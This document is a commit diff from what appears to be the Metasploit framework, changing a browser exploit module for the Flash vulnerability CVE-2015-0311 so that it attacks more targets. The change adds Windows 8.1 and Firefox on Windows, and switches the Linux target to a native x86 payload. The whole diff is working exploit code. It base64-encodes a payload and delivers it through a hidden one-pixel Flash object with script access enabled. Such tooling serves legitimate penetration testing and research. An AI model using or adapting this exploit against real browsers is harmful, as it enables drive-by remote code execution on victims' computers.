Add more targets

Author: jvazquez-r7

data/exploits/CVE-2015-0311/msf.swf

@@ -8,7 +8,6 @@
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
@@ -40,20 +39,21 @@ def initialize(info={})
         {
           'DisableNops' => true
         },
-      'Platform'            => ['win', 'unix'],
-      'Arch'                => [ARCH_X86, ARCH_CMD],
+      'Platform'            => ['win', 'linux'],
+      'Arch'                => [ARCH_X86],
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
           :arch    => ARCH_X86,
           :os_name => lambda do |os|
               os =~ OperatingSystems::Match::LINUX ||
-              os =~ OperatingSystems::Match::WINDOWS_7
+                os =~ OperatingSystems::Match::WINDOWS_7 ||
+                os =~ OperatingSystems::Match::WINDOWS_81
             end,
           :ua_name => lambda do |ua|
             case target.name
             when 'Windows'
-              return true if ua == Msf::HttpClients::IE
+              return true if [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua)
             when 'Linux'
               return true if ua == Msf::HttpClients::FF
             end
@@ -75,14 +75,12 @@ def initialize(info={})
         [
           [ 'Windows',
             {
-              'Platform' => 'win',
-              'Arch'     => ARCH_X86
+              'Platform' => 'win'
             }
           ],
           [ 'Linux',
             {
-              'Platform' => 'unix',
-              'Arch'     => ARCH_CMD
+              'Platform' => 'linux'
             }
           ]
         ],
@@ -112,15 +110,13 @@ def on_request_exploit(cli, request, target_info)
 
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
 
     if target.name =~ /Windows/
-      target_payload = get_payload(cli, target_info)
-      psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-      b64_payload = Rex::Text.encode_base64(psh_payload)
       platform_id = 'win'
     elsif target.name =~ /Linux/
-      target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
-      b64_payload = Rex::Text.encode_base64(target_payload)
       platform_id = 'linux'
     end
 
@@ -129,9 +125,9 @@ def exploit_template(cli, target_info)
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
     </object>
     </body>
     </html>